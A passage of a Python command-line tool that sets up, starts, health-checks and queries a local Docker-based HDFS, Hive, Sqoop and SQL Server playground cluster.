PORT_SQL_SQL = 3006
# Descriptions of what each port does
PORT_DOC = [
(PORT_UI_NN1, 'http', 'Web UI for the primary name node'),
(PORT_UI_DN1, 'http', 'Web UI for data node 1'),
(PORT_UI_RMAN, 'http', 'Web UI for YARN resource manager'),
(PORT_UI_NM1, 'http', 'Web UI for node manager 1'),
(PORT_UI_MRHIST, 'http', 'Web UI map reduce history server'),
(PORT_UI_HS, 'http', 'Web UI for hive server'),
(PORT_SQL_SQL, 'sql (tcp/ip)', 'SQL server connection port')
]
# A health checklist item description
NodeHealthBeanCheck = collections.namedtuple('NodeHealthBeanCheck', \
'bean_name prop_name check_func')
# The status of a single node in the cluster
NodeHealthReport = collections.namedtuple('NodeHealthReport', \
'is_healthy message')
# A summary of the status on each of the nodes in the cluster
HealthReportSummary = collections.namedtuple('HealthReportSummary', \
'cluster_healthy nn1 dn1 rman nm1 mrhist hs client sql')
class Config:
"""
Represents the configuration for any playground tasks
"""
def __init__(self, project_name=None, source_dir=None, data_dir=None, volumes_dir=None):
self.project_name = project_name
self.source_dir = source_dir
self.data_dir = data_dir
self.volumes_dir = volumes_dir
@property
def project_name(self):
"""
The project name used for the Docker-Compose project name
"""
return self._project_name
@project_name.setter
def project_name(self, value):
self._project_name = value
@property
def source_dir(self):
"""
The local directory containing files to be uploaded to the client node /src directory upon
setup.
"""
return self._source_dir
@source_dir.setter
def source_dir(self, value):
if value:
self._source_dir = os.path.abspath(value)
else:
self._source_dir = None
@property
def data_dir(self):
"""
The local directory containing files to be ingested into HDFS upon setup.
"""
return self._data_dir
@data_dir.setter
def data_dir(self, value):
if value:
self._data_dir = os.path.abspath(value)
else:
self._data_dir = None
@property
def volumes_dir(self):
"""
The local directory (which may not yet exist) where docker will persist files between runs.
"""
return self._volumes_dir
@volumes_dir.setter
def volumes_dir(self, value):
if value:
self._volumes_dir = os.path.abspath(value)
else:
self._volumes_dir = None
def save(self, filename):
"""
Saves the configuration to a file.
"""
with open(filename, 'w') as _fp:
json.dump({ \
'project_name': self._project_name, \
'source_dir': self._source_dir, \
'data_dir': self._data_dir, \
'volumes_dir': self._volumes_dir \
}, _fp, indent=2)
@staticmethod
def load(filename):
"""
Loads the configuration from a file.
"""
with open(filename, 'r') as _fp:
_c = Config()
_j = json.load(_fp)
_c.project_name = _j['project_name']
_c.source_dir = _j['source_dir']
_c.data_dir = _j['data_dir']
_c.volumes_dir = _j['volumes_dir']
return _c
def exec_docker(config, node_name, command, workdir=None, \
interactive=False, detached=False, check=True):
"""
Executes a command on a node through docker.
"""
_args = ['docker', 'exec']
if workdir:
_args.append('-w')
_args.append(workdir)
if interactive:
_args.append('-i')
_args.append('-t')
if detached:
_args.append('-d')
_args.append('%s_%s_1' % (config.project_name, node_name))
split_spaces = True
for _c in command.split('"'):
if split_spaces:
_splt = _c.split(' ')
for _s in _splt:
if _s:
_args.append(_s)
else:
_args.append(_c)
split_spaces = not split_spaces
output = subprocess.run(_args, check=check, shell=True)
return output.returncode
def build_img(config):
"""
Builds or rebuilds the dockerfile images.
"""
set_environment(config)
os.system('docker-compose -p %s -f "%s" build' % (config.project_name, COMPOSE_FILE))
def format_hdfs(config):
"""
Formats hdfs in the cluster.
"""
exec_docker(config, 'nn1', '%s/bin/hdfs namenode -format -force clust' % (HADOOP_HOME))
def ingest_data(config):
"""
Ingests data from the configured data volume into hdfs.
"""
exec_docker(config, 'nn1', '%s/bin/hadoop fs -put /data /data' % (HADOOP_HOME))
def copy_source(config):
"""
Copies from the configured local source directory to the source volume.
Use to update the client node's /src folder on a running cluster when new code is written.
"""
if not os.path.exists(config.source_dir):
print('Source directory does not exist. Please check configuration and try again.')
return
dir_name = os.path.join(config.volumes_dir, 'client')
if not os.path.exists(dir_name):
os.makedirs(dir_name)
distutils.dir_util.copy_tree(config.source_dir, dir_name)
print('Source files copied to volume.')
def setup_hive(config):
"""
Makes required hdfs directories for hive to run and initializes the schema metastore.
"""
fs_cmd = '%s/bin/hadoop fs ' % (HADOOP_HOME)
exec_docker(config, 'nn1', fs_cmd + '-mkdir /tmp', check=False)
exec_docker(config, 'nn1', fs_cmd + '-mkdir -p /user/hive/warehouse', check=False)
exec_docker(config, 'nn1', fs_cmd + '-chmod g+w /tmp')
exec_docker(config, 'nn1', fs_cmd + '-chmod g+w /user/hive/warehouse')
exec_docker(config, 'hs', '%s/bin/schematool -dbType derby -initSchema' % \
(HIVE_HOME), workdir='/metastore')
def cluster_up(config):
"""
Boots the cluster up but does not run any of the daemons.
"""
set_environment(config)
os.system('docker-compose -p %s -f "%s" up -d' % (config.project_name, COMPOSE_FILE))
def start_hadoop_daemons(config):
"""
Runs all daemons in the hadoop distribution on their respective nodes.
"""
exec_docker(config, 'nn1', '%s/bin/hdfs --daemon start namenode' % (HADOOP_HOME))
exec_docker(config, 'dn1', '%s/bin/hdfs --daemon start datanode' % (HADOOP_HOME))
exec_docker(config, 'rman', '%s/bin/yarn --daemon start resourcemanager' % (HADOOP_HOME))
exec_docker(config, 'nm1', '%s/bin/yarn --daemon start nodemanager' % (HADOOP_HOME))
exec_docker(config, 'mrhist', '%s/bin/mapred --daemon start historyserver' % (HADOOP_HOME))
def start_hive_server(config):
"""
Starts the hive server daemon.
"""
exec_docker(config, 'hs', '%s/bin/hiveserver2' % (HIVE_HOME), \
detached=True, workdir='/metastore')
def cluster_down(config):
"""
Spins the cluster down.
"""
set_environment(config)
os.system('docker-compose -p %s -f "%s" down' % (config.project_name, COMPOSE_FILE))
def metric_request(port):
"""
Sends an http request to a node's jmx endpoint. Returns the parsed json, or None on error.
"""
try:
_r = requests.get('http://localhost:%d/jmx' % (port))
except:
return None
if _r.status_code != 200:
return None
try:
return _r.json()
except ValueError:
return None
def find_bean_by_name(jsn, nme):
"""
Extracts a bean of the given name from jmx metrics json object.
"""
if 'beans' not in jsn:
return None
else:
return next((b for b in jsn['beans'] if b['name'] == nme), None)
def extract_bean_prop(jsn, bean_name, propname):
"""
Extracts a property of a bean of the given name from jmx metrics json object.
"""
bean = find_bean_by_name(jsn, bean_name)
if bean and propname in bean:
return bean[propname]
else:
return None
def gen_node_report_from_checks(jsn, checks):
"""
Creates a node health report using the jmx metrics json and a list of type NodeHealthBeanCheck
"""
healthy = True
messages = []
for _c in checks:
prop = extract_bean_prop(jsn, _c.bean_name, _c.prop_name)
if prop is not None:
report = _c.check_func(prop)
prefix = '\u2705 '
if not report.is_healthy:
healthy = False
prefix = '\u274C '
messages.append(prefix + report.message)
else:
healthy = False
messages.append('\u274C Missing required bean property. Bean name: "%s", property: "%s"' % \
(_c.bean_name, _c.prop_name))
message = '\n'.join(messages)
return NodeHealthReport(is_healthy=healthy, message=message)
def _check_func_disk_space(prop_val):
"""
A check function for comparing the prop_val to the expected disk space amount.
"""
return NodeHealthReport(is_healthy=True, message='Sufficient disk space.') \
if prop_val >= MIN_DISK_SPACE else NodeHealthReport(is_healthy=False, message='Insufficient' \
' disk space. Minimum required disk space is %d. Remaining bytes: %d' % \
(MIN_DISK_SPACE, prop_val))
def json_checker_namenode(jsn):
"""
Checks the jmx metrics json for the namenode and returns a node health report
"""
checks = [
NodeHealthBeanCheck( \
bean_name='Hadoop:service=NameNode,name=StartupProgress', \
prop_name='PercentComplete', \
check_func=lambda i: NodeHealthReport(is_healthy=True, message='Startup completed.') \
if i == 1.0 else NodeHealthReport(is_healthy=False, message='Startup not complete.' \
' Progress: %%%f.' % (i * 100)) \
),
NodeHealthBeanCheck( \
bean_name='Hadoop:service=NameNode,name=FSNamesystem', \
prop_name='tag.HAState', \
check_func=lambda i: NodeHealthReport(is_healthy=True, message='Namenode active.') \
if i == 'active' else NodeHealthReport(is_healthy=False, message='Namenode inactive.' \
' State: "%s"' % (i)) \
),
NodeHealthBeanCheck( \
bean_name='Hadoop:service=NameNode,name=FSNamesystem', \
prop_name='MissingBlocks', \
check_func=lambda i: NodeHealthReport(is_healthy=True, message='No missing blocks.') \
if i == 0 else NodeHealthReport(is_healthy=False, message='One or more missing blocks.' \
' Data is missing. Blocks missing: %d.' % (i)) \
),
NodeHealthBeanCheck( \
bean_name='Hadoop:service=NameNode,name=FSNamesystem', \
prop_name='CapacityRemaining', \
check_func=_check_func_disk_space
),
NodeHealthBeanCheck( \
bean_name='Hadoop:service=NameNode,name=FSNamesystemState', \
prop_name='NumLiveDataNodes', \
check_func=lambda i: NodeHealthReport(is_healthy=True, message='All data nodes' \
' are connected.') \
if i == 1 else NodeHealthReport(is_healthy=False, message='Some data nodes are not' \
' connected. Number of connected data nodes: %d/%d' % (i, NUM_DATA_NODES)) \
),
NodeHealthBeanCheck( \
bean_name='Hadoop:service=NameNode,name=FSNamesystemState', \
prop_name='NumStaleDataNodes', \
check_func=lambda i: NodeHealthReport(is_healthy=True, message='No stale data nodes.') \
if i == 0 else NodeHealthReport(is_healthy=False, message='Some data nodes have not ' \
'sent a heartbeat in some time. Number of stale data nodes: %d' % (i)) \
)
]
return gen_node_report_from_checks(jsn, checks)
def json_checker_datanode(jsn):
"""
Checks the jmx metrics json for the datanode and returns a node health report
"""
checks = [
NodeHealthBeanCheck( \
bean_name='Hadoop:service=DataNode,name=FSDatasetState', \
prop_name='Remaining', \
check_func=_check_func_disk_space \
),
NodeHealthBeanCheck( \
bean_name='Hadoop:service=DataNode,name=FSDatasetState', \
prop_name='NumFailedVolumes', \
check_func=lambda i: NodeHealthReport(is_healthy=True, message='No failed volumes.') \
if i == 0 else NodeHealthReport(is_healthy=False, message='One or more volumes have' \
' failed. Number of failed volumes: %d' % (i)) \
)
]
return gen_node_report_from_checks(jsn, checks)
def json_checker_resourcemanager(jsn):
"""
Checks the jmx metrics json for the resource manager node and returns a node health report
"""
checks = [
NodeHealthBeanCheck( \
bean_name='Hadoop:service=ResourceManager,name=ClusterMetrics', \
prop_name='NumActiveNMs', \
check_func=lambda i: NodeHealthReport(is_healthy=True, message='All node managers' \
' connected.') \
if i == 1 else NodeHealthReport(is_healthy=False, message='One or more node' \
' managers not connected. Number of connected node managers: %d/%d' % \
(i, NUM_NODE_MANAGERS)) \
),
NodeHealthBeanCheck( \
bean_name='Hadoop:service=ResourceManager,name=ClusterMetrics', \
prop_name='NumUnhealthyNMs', \
check_func=lambda i: NodeHealthReport(is_healthy=True, message='All node managers' \
' are healthy.') \
if i == 0 else NodeHealthReport(is_healthy=False, message='One or more node' \
' managers are unhealthy. Number of unhealthy node managers: %d' % (i)) \
)
]
return gen_node_report_from_checks(jsn, checks)
def json_checker_response_only(jsn):
"""
Checks the jmx metrics json on any node that has jmx metrics but no other specific health checks
"""
healthy = 'beans' in jsn and len(jsn['beans']) > 0
if healthy:
return NodeHealthReport(is_healthy=True, message='\u2705 Response has expected json.')
else:
return NodeHealthReport(is_healthy=False, message='\u274C Response does not' \
' have expected json.')
def gen_node_health_report(jsn, json_checker_func):
"""
Generates a node health report using the json checker function
"""
if jsn:
return json_checker_func(jsn)
else:
message = '\u274C Could not fetch metrics from server. Most likely the node is down.'
return NodeHealthReport(is_healthy=False, message=message)
def gen_docker_health_report(config, node_name):
"""
Generates a health report simply based on if the given node is running or not.
"""
return_code = exec_docker(config, node_name, 'bash -c exit 0', check=False)
if return_code == 0:
return NodeHealthReport(is_healthy=True, message='\u2705 Node running')
else:
return NodeHealthReport(is_healthy=False, message='\u274C Node not running')
def gen_health_summary(config):
"""
Generates a health report summary on the running cluster.
"""
_name_node1 = gen_node_health_report(metric_request(PORT_UI_NN1), json_checker_namenode)
_data_node1 = gen_node_health_report(metric_request(PORT_UI_DN1), json_checker_datanode)
_rman = gen_node_health_report(metric_request(PORT_UI_RMAN), json_checker_resourcemanager)
_nm1 = gen_node_health_report(metric_request(PORT_UI_NM1), json_checker_response_only)
_mrhist = gen_node_health_report(metric_request(PORT_UI_MRHIST), json_checker_response_only)
_hs = gen_node_health_report(metric_request(PORT_UI_HS), json_checker_response_only)
_client = gen_docker_health_report(config, 'client')
_sql = gen_docker_health_report(config, 'sql')
_cluster_healthy = \
_name_node1.is_healthy and \
_data_node1.is_healthy and \
_rman.is_healthy and \
_nm1.is_healthy and \
_mrhist.is_healthy and \
_hs.is_healthy and \
_client.is_healthy and \
_sql.is_healthy
summary = HealthReportSummary( \
cluster_healthy=_cluster_healthy, \
nn1=_name_node1, \
dn1=_data_node1, \
rman=_rman, \
nm1=_nm1, \
mrhist=_mrhist, \
hs=_hs, \
client=_client, \
sql=_sql)
return summary
def print_node_health(report):
"""
Prints a node health report
"""
if report is None:
print('? Report not implemented.')
print()
return
print('Overall Status:')
print('\u2705 Healthy' if report.is_healthy else '\u274C Unhealthy')
print('Checklist:')
print(report.message)
print()
def print_summary(summary):
"""
Prints a summary health report
"""
print('NAME NODE 1')
print_node_health(summary.nn1)
print('DATA NODE 1')
print_node_health(summary.dn1)
print('RESOURCE MANAGER')
print_node_health(summary.rman)
print('NODE MANAGER 1')
print_node_health(summary.nm1)
print('MAP REDUCE HISTORY SERVER')
print_node_health(summary.mrhist)
print('HIVE SERVER')
print_node_health(summary.hs)
print('CLIENT NODE')
print_node_health(summary.client)
print('SQL SERVER')
print_node_health(summary.sql)
print('OVERALL CLUSTER HEALTH')
if summary.cluster_healthy:
print('\u2705 Healthy')
else:
print('\u274C Unhealthy')
def print_health(config):
"""
Prints the health of the cluster
"""
print('Checking cluster health.')
print()
summary = gen_health_summary(config)
print_summary(summary)
def wait_for_healthy_nodes_print(config, timeout):
"""
Blocks until all nodes are healthy or until timeout, and prints the results.
"""
_start = time.time()
summary = wait_for_healthy_nodes(config, timeout=timeout)
print('Wait completed in %fs. Summary:' % (time.time() - _start))
print()
print_summary(summary)
def get_summary_preview_str(summary):
"""
Gets a oneliner string displaying the summarized cluster health
"""
_s = [
('nn1', summary.nn1.is_healthy),
('dn1', summary.dn1.is_healthy),
('rman', summary.rman.is_healthy),
('nm1', summary.nm1.is_healthy),
('mrhist', summary.mrhist.is_healthy),
('hs', summary.hs.is_healthy),
('client', summary.client.is_healthy),
('sql', summary.sql.is_healthy)
]
_s2 = map(lambda a : '%s %s' % \
(('\u2705' if a[1] else '\u274C'), a[0]), _s)
return ', '.join(_s2)
def wait_for_healthy_nodes(config, timeout=200, interval=5):
"""
Blocks until all nodes are healthy or until timeout
"""
_summary = None
for _t in range(int(timeout / interval)):
_summary = gen_health_summary(config)
if _summary.cluster_healthy:
return _summary
else:
print('...Waiting... ' + get_summary_preview_str(_summary))
time.sleep(interval)
return _summary
def setup(config):
"""
One-time setup for the cluster.
"""
print('Destroying volumes.')
destroy_volumes(config)
print('Spinning cluster up.')
cluster_up(config)
print('Formatting HDFS.')
format_hdfs(config)
print('Starting Hadoop Daemons.')
start_hadoop_daemons(config)
print('Setting up Hive server.')
setup_hive(config)
print('Ingesting configured data volume into HDFS (this could take some time).')
ingest_data(config)
print('Copying configured source folder to the client node volume.')
copy_source(config)
print('Spinning cluster down.')
cluster_down(config)
def print_port_doc():
"""
Prints documentation on the exposed ports.
"""
print('Exposed ports on localhost:')
for _p in PORT_DOC:
print('Port: %s, Type: %s, Description: %s' % \
(_p[0], _p[1], _p[2]))
def start(config, wait=True):
"""
Boots up the cluster and starts all of the daemons on the cluster.
"""
print('Spinning cluster up.')
cluster_up(config)
print('Starting Hadoop Daemons.')
start_hadoop_daemons(config)
print('Starting Hive Server.')
start_hive_server(config)
if wait:
print('Starting wait routine.')
wait_for_healthy_nodes_print(config, 200)
print_port_doc()
def stop(config):
"""
Spins down the cluster.
"""
print('Spinning cluster down.')
cluster_down(config)
def destroy_volumes(config):
"""
Removes the persistant file storage of the cluster.
"""
print('Spinning cluster down.')
cluster_down(config)
if not os.path.exists(config.volumes_dir):
print('Volumes directory does not exist. Cannot delete.')
else:
print('Deleting files.')
shutil.rmtree(config.volumes_dir)
def print_hadoop_node_logs(config, node_name):
"""
Prints the logs of the given hadoop node.
"""
exec_docker(config, node_name, 'cat %s/logs/*.log')
def beeline_cli(config):
"""
Launches an interactive cli on the client node with beeline cli.
"""
exec_docker(config, 'client', '%s/bin/beeline -u jdbc:hive2://hs:10000' % (HIVE_HOME), \
workdir='/src', interactive=True)
def bash_cli(config, nodename):
"""
Launches an interactive bash shell on the given node.
"""
exec_docker(config, nodename, 'bash', interactive=True)
def sqlcmd_cli(config, local):
"""
Launches an interactive sql cli on the client node or local host if specified.
"""
if local:
os.system('sqlcmd -S tcp:localhost,%d -U sa -P %s' % (PORT_SQL_SQL, SQL_TEST_PASSWORD))
else:
exec_docker(config, 'client', '/opt/mssql-tools/bin/sqlcmd -S sql -U sa -P %s' % \
(SQL_TEST_PASSWORD), workdir='/src', interactive=True)
def sql_exec_query(config, query, database_name='master'):
"""
Executes an sql query from the client node.
"""
exec_docker(config, 'client', '/opt/mssql-tools/bin/sqlcmd -S sql' \
' -U sa -d %s -P %s -q "%s"' % \
(database_name, SQL_TEST_PASSWORD, query), workdir='/src')
def sql_exec_file(config, filename):
"""
Executes an sql file from the source directory on the client node.
"""
exec_docker(config, 'client', '/opt/mssql-tools/bin/sqlcmd -S sql -U sa -P %s -i "%s"' % \
(SQL_TEST_PASSWORD, filename), workdir='/src')
def sqoop_export(config, export_dir, sql_table, database_name='master', delimiter=','):
"""
Exports HDFS text delimited files to the sql node.
"""
exec_docker(config, 'client', '%s/bin/sqoop export --connect' \
' "jdbc:sqlserver://sql;databaseName=%s"' \
' --username "sa" --password "%s" --export-dir "%s" --table "%s"' \
' --input-fields-terminated-by "%s"' % \
(SQOOP_HOME, database_name, SQL_TEST_PASSWORD, export_dir, sql_table, delimiter), \
workdir='/src')
def launch_ssms_win_local(executable_path):
"""
Launches Sql Server Management Studio locally.
"""
if os.name == 'nt':
if os.path.exists(executable_path):
print('Note: Connection will only succeed if "Remember Password" has been checked in ' \
'the SSMS login previously.')
print('Use test password: %s' % (SQL_TEST_PASSWORD))
os.system('"%s" -S tcp:localhost,%d -U sa' % (executable_path, PORT_SQL_SQL))
else:
print('The executable path for ssms does not exist. Please provide the correct one with' \
' arg "-f".' \
)
else:
print('This command is not implemented for non-Windows platforms.')
def exec_hive_file(config, src_file):
"""
Executes a hive script file from the source directory on the client node.
"""
exec_docker(config, 'client', '%s/bin/beeline -u jdbc:hive2://hs:10000 -f %s' % \
(HIVE_HOME, src_file), workdir='/src')
def exec_hive_query(config, query):
"""
Executes a hive query from the client node.
"""
exec_docker(config, 'client', '%s/bin/beeline -u jdbc:hive2://hs:10000 -e "%s"' % \
(HIVE_HOME, query), workdir='/src')
def input_with_validator(prompt, failure_msg, validator_func):
"""
Prompts for interactive user input using a validator function.
"""
while True:
val = input(prompt)
if validator_func(val):
return val
else:
print(failure_msg)
def validate_project_name(val):
"""
Input validator function for project name configuration.
"""
pattern = re.compile(r'\W')
return not pattern.search(val) and val.isalnum()
def validate_directory(val):
"""
Input validator function for a directory name.
"""
return os.path.exists(val)
def validate_parent_directory(val):
"""
Input validator function for a directory name where only the parent directory needs to exist.
"""
return os.path.exists(os.path.dirname(val))
def validate_yn(val):
"""
Input validator function for yes/no prompts.
"""
_l = val.lower()
return _l == 'y' or _l == 'n'
def set_environment(config):
"""
Sets the environment variables for consumption by docker-compose.
"""
os.environ['project_name'] = config.project_name
os.environ['source_dir'] = config.source_dir
os.environ['data_dir'] = config.data_dir
os.environ['volumes_dir'] = config.volumes_dir
os.environ['sql_test_password'] = <PASSWORD>
def configure(args):
"""
Returns config using a file, arguments, or interactive input.
"""
_f = args.config_file
config = None
if get_config_file_needed(args):
if not os.path.exists(_f):
_o = input_with_validator('Config file "%s" does not exist. Would you like to create one' \
' interactively? (y/n): ' % _f, 'Please input "y" or "n".', validate_yn)
if _o.lower() == 'y':
config = configure_interactively()
config.save(_f)
print('Config saved.')
else:
print('Program needs configuration. Exiting.')
sys.exit(1)
return
else:
config = Config.load(_f)
print('Config read.')
if args.project_name:
config.project_name = args.project_name
if args.source_dir:
config.source_dir = args.source_dir
if args.data_dir:
config.data_dir = args.data_dir
if args.volumes_dir:
config.volumes_dir = args.volumes_dir
else:
config = Config(args.project_name, args.source_dir, args.data_dir, args.volumes_dir)
return config
def configure_interactively():
"""
Creates a config from interactive input.
"""
proj_name = input_with_validator( \
'Please input your project name: ', \
'No spaces or non-alphanumeric characters allowed.', \
validate_project_name \
)
src_dir = input_with_validator( \
'Please input your playground src directory: ', \
'Please use a valid directory name that exists.', \
validate_directory \
)
data_dir = input_with_validator( \
'Please input your data directory: ', \
'Please use a valid directory name that exists.', \
validate_directory \
)
vol_dir = input_with_validator( \
'Please input your volumes directory: ', \
'Please use a valid parent directory name that exists.', \
validate_parent_directory \
)
config = Config(proj_name, src_dir, data_dir, vol_dir)
return config
def build_img_cmd(config, args):
"""
Command line function. See build_img() for documentation.
"""
build_img(config)
def format_hdfs_cmd(config, args):
"""
Command line function. See format_hdfs() for documentation.
"""
format_hdfs(config)
def ingest_data_cmd(config, args):
"""
Command line function. See ingest_data() for documentation.
"""
ingest_data(config)
def copy_source_cmd(config, args):
"""
Command line function. See copy_source() for documentation.
"""
copy_source(config)
def setup_hive_cmd(config, args):
"""
Command line function. See setup_hive() for documentation.
"""
setup_hive(config)
def cluster_up_cmd(config, args):
"""
Command line function. See cluster_up() for documentation.
"""
cluster_up(config)
def start_hadoop_daemons_cmd(config, args):
"""
Command line function. See start_hadoop_daemons() for documentation.
"""
start_hadoop_daemons(config)
def start_hive_server_cmd(config, args):
"""
Command line function. See start_hive_server() for documentation.
"""
start_hive_server(config)
def cluster_down_cmd(config, args):
"""
Command line function. See cluster_down() for documentation.
"""
cluster_down(config)
def setup_cmd(config, args):
"""
Command line function. See setup() for documentation.
"""
if args.skip_confirm:
setup(config)
return
result = input_with_validator('Are you sure you want to delete directory "%s" and all of its' \
' files? y/n: ' % (config.volumes_dir), \
'Please use "y" or "n".', \
validate_yn \
).lower()
if result == 'y':
setup(config)
else:
print('Cancelling.')
def start_cmd(config, args):
"""
Command line function. See start() for documentation.
"""
start(config, wait=not args.no_wait)
def stop_cmd(config, args):
"""
Command line function. See stop() for documentation.
"""
stop(config)
def destroy_volumes_cmd(config, args):
"""
Command line function. See destroy_volumes() for documentation.
"""
if args.skip_confirm:
destroy_volumes(config)
return
result = input_with_validator('Are you sure you want to delete directory "%s" and all of its' \
' files? y/n: ' % (config.volumes_dir), \
'Please use "y" or "n".', \
validate_yn \
).lower()
if result == 'y':
destroy_volumes(config)
else:
print('Cancelling.')
def print_hadoop_node_logs_cmd(config, args):
"""
Command line function. See print_hadoop_node_logs() for documentation.
"""
print_hadoop_node_logs(config, args.node)
def beeline_cli_cmd(config, args):
"""
Command line function. See beeline_cli() for documentation.
"""
beeline_cli(config)
def bash_cli_cmd(config, args):
"""
Command line function. See bash_cli() for documentation.
"""
bash_cli(config, args.node)
def sqlcmd_cli_cmd(config, args):
"""
Command line function. See sqlcmd_cli() for documentation.
"""
sqlcmd_cli(config, args.local)
def sql_exec_query_cmd(config, args):
"""
Command line function. See sql_exec_query() for documentation.
"""
sql_exec_query(config, args.query, args.database)
def sql_exec_file_cmd(config, args):
"""
Command line function. See sql_exec_file() for documentation.
"""
sql_exec_file(config, args.filename)
def sqoop_export_cmd(config, args):
"""
Command line function. See sqoop_export() for documentation.
"""
sqoop_export(config, args.export_dir, args.sql_table, args.database_name, args.delimiter)
def local_sql_info_cmd(config, args):
"""
Command line function. Prints out non-secured sql server connection info.
"""
print('SERVER NAME: tcp:localhost,%d' % (PORT_SQL_SQL))
print('AUTHENTICATION: SQL Server AUthentication')
print('LOGIN: sa')
print('PASSWORD: %s' % (SQL_TEST_PASSWORD))
def launch_ssms_win_local_cmd(config, args):
"""
Command line function. See launch_ssms_win_local() for documentation.
"""
launch_ssms_win_local(args.executable_path)
def exec_hive_file_cmd(config, args):
"""
Command line function. See exec_hive_file() for documentation.
"""
exec_hive_file(config, args.src_path)
def exec_hive_query_cmd(config, args):
"""
Command line function. See exec_hive_query() for documentation.
"""
exec_hive_query(config, args.query)
def print_health_cmd(config, args):
"""
Command line function. See print_health() for documentation.
"""
print_health(config)
def wait_for_healthy_nodes_cmd(config, args):
"""
Command line function. See wait_for_healthy_nodes_print() for documentation.
"""
wait_for_healthy_nodes_print(config, args.timeout)
def get_config_file_needed(args):
"""
Determines whether or not we need to fetch additional config variables from a file.
"""
return not (args.project_name and args.source_dir and args.data_dir and args.volumes_dir)
def main():
"""
Main entry point for the program
"""
parser = argparse.ArgumentParser(prog='playground', description='HDFS, Hive, and SQL Playground')
parser.set_defaults(func=None)
# config-file
parser.add_argument('--config-file', '-c', default='config.json', help='The filename' \
' of the configuration file.')
# config-overrides
config_group = parser.add_argument_group('config-overrides', description='Overrides' \
' the configuration variables.')
config_group.add_argument('--project-name', '-p')
config_group.add_argument('--source-dir', '-s')
config_group.add_argument('--data-dir', '-d')
config_group.add_argument('--volumes-dir', '-v')
config_group.set_defaults(project_name=None, source_dir=None, data_dir=None, volumes_dir=None)
subparsers = parser.add_subparsers()
# build-img
subparsers.add_parser('build-img', help='Builds or rebuilds the required Docker images. Do this' \
' when you change the Dockerfile or anything in ./bin/.').set_defaults(func=build_img_cmd)
# format-hdfs
subparsers.add_parser('format-hdfs', help='Formats the entire distributed file system of the' \
' running cluster.').set_defaults(func=format_hdfs_cmd)
# ingest-data
subparsers.add_parser('ingest-data', help='Copies the mounted data volume to HDFS at /data on' \
' the running cluster.').set_defaults(func=ingest_data_cmd)
# copy-source
subparsers.add_parser('copy-source', help='Copies the configured source folder to the mounted' \
' client node volume.').set_defaults(func=copy_source_cmd)
# setup-hive
subparsers.add_parser('setup-hive', help='Creates the Hive schema metastore and makes' \
' necessary directories in HDFS. Cluster should be up and hadoop daemons should already' \
' be running.').set_defaults(func=setup_hive_cmd)
# cluster-up
subparsers.add_parser('cluster-up', help='Boots up all the nodes on the cluster but does not' \
' start any of their services.').set_defaults(func=cluster_up_cmd)
# start-hadoop
subparsers.add_parser('start-hadoop', help='Starts the name node and data node services for' \
' HDFS on a running cluster.').set_defaults(func=start_hadoop_daemons_cmd)
# start-hive
subparsers.add_parser('start-hive', help='Starts the hive server in the running cluster.') \
.set_defaults(func=start_hive_server_cmd)
# cluster-down
subparsers.add_parser('cluster-down', help='Shuts down all of the nodes.') \
.set_defaults(func=cluster_down_cmd)
# setup
setup_p = subparsers.add_parser('setup', help='Sets up the cluster for the first time.')
setup_p.add_argument('--skip-confirm', '-y', action='store_true', help='Skips any confirmation' \
' messages')
setup_p.set_defaults(func=setup_cmd, skip_confirm=False)
# start
start_p = subparsers.add_parser('start', help='Spins up the cluster and starts the daemons on ' \
'each node.')
start_p.add_argument('--no-wait', '-w', action='store_true', help='Exits immediately after ' \
'the cluster daemons have been told to start rather than blocking until the nodes are healthy.')
start_p.set_defaults(func=start_cmd, no_wait=False)
# stop
subparsers.add_parser('stop', help='Stops all of the services and shuts down all of the nodes.') \
.set_defaults(func=stop_cmd)
# destroy-vol
destroy_vol_p = subparsers.add_parser('destroy-vol', help='Removes all persisted cluster files.')
destroy_vol_p.add_argument('--skip-confirm', '-y', action='store_true')
destroy_vol_p.set_defaults(func=destroy_volumes_cmd, skip_confirm=False)
# print-hadoop-logs
print_hadoop_node_logs_p = subparsers.add_parser('print-hadoop-logs', help='Prints the log file' \
' of the specified hadoop node.')
print_hadoop_node_logs_p.add_argument('--node', '-n', help='The node to check the logs for.')
print_hadoop_node_logs_p.set_defaults(func=print_hadoop_node_logs_cmd)
# beeline-cli
subparsers.add_parser('beeline-cli', help='Launches a cli using beeline on the client node.') \
.set_defaults(func=beeline_cli_cmd)
# bash-cli
bash_cli_p = subparsers.add_parser('bash-cli', help='Launches bash cli on a single node in the' \
' cluster.')
bash_cli_p.add_argument('--node', '-n', help='The Docker service name of the node. Refer to the' \
' docker-compose.yml. Examples: "client", "nn1", "dn1", etc.')
bash_cli_p.set_defaults(func=bash_cli_cmd, node='client')
# sql-cli
sql_cli_p = subparsers.add_parser('sql-cli', help='Launches sqlcmd on the client' \
' node or locally.')
sql_cli_p.add_argument('--local', '-l', action='store_true', help='If specified, sqlcmd is' \
' launched on the host machine instead of the client node. Note: this requires sqlcmd to' \
' be on the environment PATH variable.')
sql_cli_p.set_defaults(func=sqlcmd_cli_cmd, local=False)
# sql-exec-query
sql_exec_query_p = subparsers.add_parser('sql-exec-query', help='Executes an SQL query.')
sql_exec_query_p.add_argument('--query', '-q', help='The sql query.')
sql_exec_query_p.add_argument('--database', '-d', help='The database to use.')
sql_exec_query_p.set_defaults(func=sql_exec_query_cmd, database='master')
# sql-exec-file
sql_exec_file_p = subparsers.add_parser('sql-exec-file', help='Executes an SQL file on the ' \
'client node.')
sql_exec_file_p.add_argument('--filename', '-f', help='The relative filename in the source dir.')
sql_exec_file_p.set_defaults(func=sql_exec_file_cmd)
# sqoop-export
sqoop_export_p = subparsers.add_parser('sqoop-export', help='Exports CSV files loaded in HDFS' \
' to the sql server node.')
#args.export_dir, args.sql_table, args.database_name, args.delimiter
sqoop_export_p.add_argument('--export-dir', '-e', help='The directory in HDFS which contains' \
' the CSV files.')
sqoop_export_p.add_argument('--sql-table', '-t', help='The name of the sql table to export to.' \
' Note: this table should already exist with the correct schema.')
sqoop_export_p.add_argument('--database-name', '-b', help='The name of the database to' \
' export to.')
sqoop_export_p.add_argument('--delimiter', '-d', help='The character used to for delimiting' \
' the values in the HDFS files.')
sqoop_export_p.set_defaults(func=sqoop_export_cmd, database_name='master', delimiter=',')
# local-sql-info
subparsers.add_parser('local-sql-info', help='Shows the connection information for connecting' \
' to the sql server from the parent host.').set_defaults(func=local_sql_info_cmd)
# launch-ssms
launch_ssms_p = subparsers.add_parser('launch-ssms', help='Note: Only works on Windows and' \
' requires installation of SQL Server Management Server. This command launches SQL Server' \
' Management Server using the local connection information.')
